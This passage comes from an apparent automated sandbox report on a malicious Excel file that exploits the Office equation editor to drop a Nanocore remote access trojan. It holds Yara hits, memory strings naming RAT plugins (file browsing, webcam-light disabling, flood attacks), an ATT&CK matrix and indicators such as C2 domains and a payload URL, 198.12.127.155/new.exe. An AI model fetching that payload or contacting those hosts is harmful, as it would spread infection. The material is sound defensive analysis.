          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Detected Nanocore RatShow sources
          Source: vbc.exe, 00000004.00000002.2208102788.00000000022FC000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
          Source: RegAsm.exe, 00000005.00000002.2363768738.0000000000A40000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
          Source: RegAsm.exe, 00000005.00000002.2363611827.0000000000660000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
          Source: RegAsm.exe, 00000005.00000002.2363541585.00000000005A0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
          Source: RegAsm.exe, 00000005.00000002.2363890046.0000000000C00000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
          Source: RegAsm.exe, 00000005.00000002.2363636659.00000000006C0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000004.00000002.2208200513.00000000032B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363468817.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208432610.0000000003526000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2206635485.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2363977064.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2207136655.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2364567768.0000000002A21000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2365764646.0000000003B49000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2208264048.0000000003395000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2164, type: MEMORY
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3486e00.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3627c48.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de4629.13.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.de0000.14.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3436de0.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.340edc0.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b73634.26.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b67402.28.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.3b625d6.27.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder1Extra Window Memory Injection1Disable or Modify Tools1Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection312Deobfuscate/Decode Files or Information1LSASS MemorySystem Information Discovery13Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Registry Run Keys / Startup Folder1Obfuscated Files or Information31Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing13NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonMasquerading111Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol122Jamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsVirtualization/Sandbox Evasion21DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobProcess Injection312Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Hidden Files and Directories1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 431726 Sample: Ref 0180066743.xlsx Startdate: 09/06/2021 Architecture: WINDOWS Score: 100 36 wekeepworking12.sytes.net 2->36 52 Multi AV Scanner detection for domain / URL 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 18 other signatures 2->58 8 EQNEDT32.EXE 12 2->8         started        13 EXCEL.EXE 38 33 2->13         started        signatures3 process4 dnsIp5 42 198.12.127.155, 49167, 80 AS-COLOCROSSINGUS United States 8->42 26 C:\Users\user\AppData\Local\...\new[1].exe, PE32 8->26 dropped 28 C:\Users\Public\vbc.exe, PE32 8->28 dropped 62 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->62 15 vbc.exe 1 2 8->15         started        30 C:\Users\user\Desktop\~$Ref 0180066743.xlsx, data 13->30 dropped file6 signatures7 process8 file9 32 C:\Users\user\AppData\Roaming\win33.exe, PE32 15->32 dropped 34 C:\Users\user\AppData\Local\Temp\RegAsm.exe, PE32 15->34 dropped 44 Multi AV Scanner detection for dropped file 15->44 46 Creates an undocumented autostart registry key 15->46 48 Machine Learning detection for dropped file 15->48 50 3 other signatures 15->50 19 RegAsm.exe 4 15->19         started        signatures10 process11 dnsIp12 38 wekeepworking.sytes.net 79.134.225.90, 1144, 49168, 49169 FINK-TELECOM-SERVICESCH Switzerland 19->38 40 wekeepworking12.sytes.net 19->40 24 C:\Users\user\AppData\Roaming\...\run.dat, ISO-8859 19->24 dropped 60 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->60 file13 signatures14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Ref 0180066743.xlsx22%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\win33.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe39%VirustotalBrowse
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\new[1].exe30%ReversingLabsByteCode-MSIL.Trojan.Bulz
          C:\Users\user\AppData\Local\Temp\RegAsm.exe0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\RegAsm.exe0%ReversingLabs
          C:\Users\user\AppData\Roaming\win33.exe30%ReversingLabsByteCode-MSIL.Trojan.Bulz
          C:\Users\Public\vbc.exe30%ReversingLabsByteCode-MSIL.Trojan.Bulz

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.RegAsm.exe.400000.2.unpack100%AviraTR/Dropper.GenDownload File
          5.0.RegAsm.exe.400000.4.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          5.0.RegAsm.exe.400000.2.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          5.2.RegAsm.exe.de0000.14.unpack100%AviraTR/NanoCore.fadteDownload File

          Domains

          SourceDetectionScannerLabelLink
          wekeepworking.sytes.net8%VirustotalBrowse
          wekeepworking12.sytes.net2%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          wekeepworking.sytes.net8%VirustotalBrowse
          wekeepworking.sytes.net0%Avira URL Cloudsafe
          http://198.12.127.155/new.exe0%Avira URL Cloudsafe
          wekeepworking12.sytes.net2%VirustotalBrowse
          wekeepworking12.sytes.net0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          wekeepworking.sytes.net
          79.134.225.90
          truetrueunknown
          wekeepworking12.sytes.net
          unknown
          unknowntrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          wekeepworking.sytes.nettrue
          • 8%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://198.12.127.155/new.exetrue
          • Avira URL Cloud: safe
          unknown
          wekeepworking12.sytes.nettrue
          • 2%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.%s.comPARegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          low
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.RegAsm.exe, 00000005.00000002.2364096438.0000000002630000.00000002.00000001.sdmpfalse
            high
            http://www.day.com/dam/1.0FFD606D5.emf.0.drfalse
              high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              79.134.225.90
              wekeepworking.sytes.netSwitzerland
              6775FINK-TELECOM-SERVICESCHtrue
              198.12.127.155
              unknownUnited States
              36352AS-COLOCROSSINGUStrue

              General Information

              Joe Sandbox Version:32.0.0 Black Diamond
              Analysis ID:431726
              Start date:09.06.2021
              Start time:08:03:35
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 8m 17s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:Ref 0180066743.xlsx
              Cookbook file name:defaultwindowsofficecookbook.jbs
              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
              Number of analysed new started processes analysed:6
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.expl.evad.winXLSX@6/20@41/2
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 3.3% (good quality ratio 2.6%)
              • Quality average: 51.8%
              • Quality standard deviation: 33.9%
              HCA Information:
              • Successful, ratio: 96%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .xlsx
              • Found Word or Excel or PowerPoint or XPS Viewer
              • Attach to Office via COM
              • Scroll down
              • Close Viewer
              Warnings:
              Show All
              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
              • TCP Packets have been reduced to 100
              • Exclude process from analysis (whitelisted): dllhost.exe
              • Report size getting too big, too many NtCreateFile calls found.
              • Report size getting too big, too many NtQueryAttributesFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              TimeTypeDescription
              08:05:07API Interceptor60x Sleep call for process: EQNEDT32.EXE modified
              08:05:09API Interceptor214x Sleep call for process: vbc.exe modified
              08:05:37API Interceptor1171x Sleep call for process: RegAsm.exe modified

              Joe Sandbox View / Context

              IPs

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              79.134.225.90AedJpyQ9lM.exeGet hashmaliciousBrowse
                Purchase Order Price List.xlsxGet hashmaliciousBrowse
                  qdFDmi3Bhy.exeGet hashmaliciousBrowse
                    A2PlnLyOA7.exeGet hashmaliciousBrowse
                      SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exeGet hashmaliciousBrowse
                        LOT_20210526.xlsxGet hashmaliciousBrowse
                          Q2MAUt4mRO.exeGet hashmaliciousBrowse
                            4fn66P5vkl.exeGet hashmaliciousBrowse
                              P_O 00041221.xlsxGet hashmaliciousBrowse
                                LOT_20210526.xlsxGet hashmaliciousBrowse
                                  Swift Copy.exeGet hashmaliciousBrowse
                                    198.12.127.155Purchase Order Price List.xlsxGet hashmaliciousBrowse
                                    • confucanism.hopto.org/new.exe

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                    wekeepworking.sytes.netAedJpyQ9lM.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    Purchase Order Price List.xlsxGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    qdFDmi3Bhy.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
                                    A2PlnLyOA7.exeGet hashmaliciousBrowse
                                    • 79.134.225.90
